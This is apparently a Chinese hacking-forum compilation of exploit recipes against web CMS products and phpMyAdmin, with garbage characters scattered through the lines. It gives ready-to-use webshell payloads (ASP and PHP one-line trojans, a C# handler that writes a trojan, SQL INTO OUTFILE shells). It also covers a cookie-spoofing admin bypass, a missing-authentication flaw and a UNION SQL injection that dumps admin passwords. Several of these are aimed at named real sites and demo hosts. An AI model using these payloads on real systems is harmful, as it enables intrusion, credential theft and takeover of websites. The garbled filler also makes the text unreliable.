<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
: L" q2 L7 l0 Z, @* v4 rUpload a new file:<br>' m0 Z0 ^; f5 B/ H
<input type="file" name="NewFile" size="50"><br>
4 B$ p$ U7 f0 T/ }# i<input id="btnUpload" type="submit" value="Upload">
/ D- E* t9 m$ Y& {9 i</form>
; r2 W+ ~3 y) W C' g-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( ]$ E: c7 B% `
+ e( q) D- u: ASDcms 后台拿webshell$ g5 B# s1 |8 ~4 U7 X9 c
: M; Y) \5 Q& ]8 R" ^- j/ \
第一种方法:
1 P- | j% t0 \3 E2 a* A4 b进入后台-->系统管理-->系统设置-->系统设置->网站名称;' p& S+ y8 `' @
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
; }6 J$ c2 u3 u8 @5 I8 D) R用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
: ~# E1 d' Z& c2 n第二种方法:! d1 P- T" ]" G4 T0 m4 P1 ?
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
6 j& P4 [ g. ^+ n# ^' o; U在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
1 v/ {! p1 r! y4 K% z3 j W第三种方法:2 |# U0 W* `+ u9 U6 R/ s" M. G. g
进入后台-->界面管理-->模板文件管理-->创建文件, R1 R& E: {9 c& H% U9 O+ y
文件名写入getshell.ashx; Q- [7 U6 M" I- c; A/ C( j
内容写入下面内容:
* j0 P- H) ~! g7 Z( A W/====================复制下面的=========================/
0 J4 N. Z/ H" q. |<%@ WebHandler Language="C#" Class="Handler" %>: {* P/ O$ s, `. Y4 ^/ ~$ G
using System;( W2 x8 @+ ^; Y% z" L
using System.Web;
/ n. K& u" Z2 |9 U5 `using System.IO;
, [* z" S4 F. D% D1 W6 U( {5 d# |public class Handler : IHttpHandler {
7 e, J) G9 }' m$ U3 R+ {+ Apublic void ProcessRequest (HttpContext context) {
, j0 f, a$ m+ X+ G) `9 a; |context.Response.ContentType = "text/plain";
9 r* ~2 I" I- I8 D2 p) KStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
$ B3 C" Y/ `3 afile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>"); ~/ Y" ?2 n2 c- ?: E4 J6 D
file1.Flush();* u8 v M k+ ~5 Y7 d) _" |/ j
file1.Close();$ d9 n1 I1 w0 J7 c7 ]8 y) }
}
( B' [; I& J f" d9 D0 Hpublic bool IsReusable {
- {' i$ ?1 W0 Y/ lget {0 @+ G7 _$ w. i! i
return false;
* }+ P9 t0 P0 T}; p9 i, I5 I" u6 c9 ?# h" M4 m# A# a
}
3 k9 b) ~- g4 E+ v$ H}
+ h6 {' ?' b% O2 {0 K/ Y' x! G/=============================================/
( @- v& G1 s/ N2 I4 P1 k访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx* I& p0 ~$ h1 x, h2 J
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接' ^' k2 d: R' r4 X2 S+ w
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% z, f* O2 R R- a$ |" r/ a. ~4 ^+ D& n
ESCMS网站管理系统0day: p9 [) X+ \# L) I" I1 B3 T
9 T+ m6 B# n# L' o
后台登陆验证是通过admin/check.asp实现的
1 Z) s+ A; L6 o5 Y( q, r5 J7 g, J1 t$ g( x! Y" D/ U9 Y- p9 z
首先我们打开http://target.com/admin/es_index.html& E! b; `( ^) Y# a
然后在COOKIE结尾加上) c5 v3 o) |# x0 g6 r& |
; ESCMS$_SP2=ES_admin=st0p;
) ^3 m3 p. |" V; y" B' r6 b修改,然后刷新
4 k. L6 [& l2 E; G% f进后台了嘎..
% ]4 a- W! S! A+ C然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
0 L% k7 ~# p6 A" m& f3 s, W
% Q2 h; ]% k" ?- f6 K利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.( _: {# O$ }3 z
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
0 H9 D; z6 C! m1 ]1 h* L' h9 P: t存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
: F& U* V: n) Y; e6 \) Y0 J在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
7 b' P( t$ J3 z5 W4 U0 E------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( Q& C$ m+ ?2 Y( O8 [
3 e1 ~7 Y" V. a" S1 C/ `5 V宁志网站管理系统后台无验证漏洞及修复 O+ @, z( c/ f; G
3 u9 u. c. p$ g: o9 |4 f9 \网上搜了一下,好像没有发布.如有雷同纯粹巧合!- p& _/ N R( {( \3 ~3 b- t0 G
官方网站:www.ningzhi.net9 Q" ?: k, l# F. z$ k3 v
学校网站管理系统 V.2011版本
/ v* w# _1 P7 w* ihttp://down.chinaz.com/soft/29943.htm
$ o; T6 s" F' [5 s# Y/ Q: I其它版本(如:政府版等),自行下载.
. n8 L7 c' S# J7 r, M漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~' |4 t% Q8 D& c9 j4 t" ]
login.asp代码如下:
5 S; ]7 [% U9 y5 {$ e' U, o9 K4 z<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> $ O) a9 R. X( T
manage.asp代码我就不帖出来了.反正也没验证.8 j9 i" O: J s) L! G4 b) w, i' Z
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
( g- z' Y# I# g2 {漏洞利用:& J3 P! @& Y! C \
直接访问http://www.0855.tv/admin/manage.asp3 u( l. h2 r- z9 Q
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
; h3 Y8 w& n. x0 Q9 a----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 {1 ]+ ]$ \7 r/ I
, }! i% J8 j/ rphpmyadmin拿shell的四种方法总结及修复
' S* ]7 W& [, L2 q& O' O1 o" O" ?, y6 [
方法一:4 A+ p9 `: F0 p" r
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );8 @. I9 _9 m- I I
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');5 M4 q' R+ R' ~" g7 O8 M9 v% e
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
! b0 J Z/ d; j----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
6 X/ Q) p$ c* I 一句话连接密码:7on* _! t+ h- J, [% j( s, v* X( ~
方法二:; i( x0 m( a6 H* q/ ?2 l
读取文件内容: select load_file('E:/xamp/www/s.php');
e& O7 D3 w, j1 G写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'5 W [! C: T$ Q
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
4 I/ k5 S& j, f" N5 B方法三:- L/ y& n1 p5 m+ C" Q
JhackJ版本 PHPmyadmin拿shell
3 I9 Z4 G- O( [9 p, T8 @% ECreate TABLE study (cmd text NOT NULL);
) P% T- @3 i; K3 q3 i, @Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');1 t1 |- a3 i- v8 r$ A+ S" P
select cmd from study into outfile 'E:/wamp/www/7.php';
: B/ l* U6 z5 _( Q+ VDrop TABLE IF EXISTS study;
8 s6 h, w6 {6 ]. G/ ?<?php eval($_POST[cmd])?>) m4 \. u6 @; ?7 q `/ v* L' c
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。1 O7 P/ H) Y* h4 [1 m7 D3 s. {
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1! Q0 m2 H6 t/ R1 r5 B' y
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
; n1 |2 |" D! EDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
) ^; s/ m+ w, S6 u% L# O6 I& g! l方法四:
" }2 B3 s \* Y1 U* `* i! a; `& W9 M2 Nselect load_file('E:/xamp/www/study.php');
3 Q$ Z3 z- i3 G/ v h, U3 E: _select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
. J4 L7 F' T& a( A: u然后访问网站目录:http://www.2cto.com/study.php?cmd=dir5 m5 ~5 l( D4 O' ~9 K
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------8 x5 y' [. @$ u& ?; C
+ C' g4 x5 B8 {( k7 GNO.001中学网站管理系统 Build 110628 注入漏洞
* ~' p, c2 z$ f! d1 F" U- {7 A
: D' C# a1 {2 d8 C+ b, o. cNO.001中学网站管理系统功能模块:; {% v9 W) H1 ?/ C9 h1 h1 M
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
# L1 j2 ]2 y: A8 [2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
6 Z& {; p8 u3 h% p4 q. N$ N4 M' }3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息% _$ k2 k2 ^ J
4.视频图片管理:一级分类,动态添加视频或者图片等信息% M* v g- ]- k
5.留言管理:对留言,修改,删除、回复等管理6 b5 \* D: k9 f
6.校友频道:包括校友资料excel导出、管理等功能. \$ l* Z# R& v2 x6 w
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
3 O6 D5 Y* J! p X2 F: j8 w f+ F n默认后台:admin/login.asp# i* O" _# _! V6 ?& z- |; F& r
官方演示:http://demo.001cms.net
$ Y0 T5 |) f7 m/ d2 F源码下载地址:http://down.chinaz.com/soft/30187.htm# b+ s$ w/ a7 S3 g% z( W
EXP:8 t; W3 F1 C) f3 k$ c2 V/ c
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
( w$ C/ D+ {% [% N% i* f测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
. x% j! t* u R7 n( e- H3 f& q! e1 Mgetshell:后台有备份,你懂的8 E2 G# a u9 }" s3 [% h4 S$ Q7 q# N
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。, n/ g' \# T, G, R e9 n) o
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |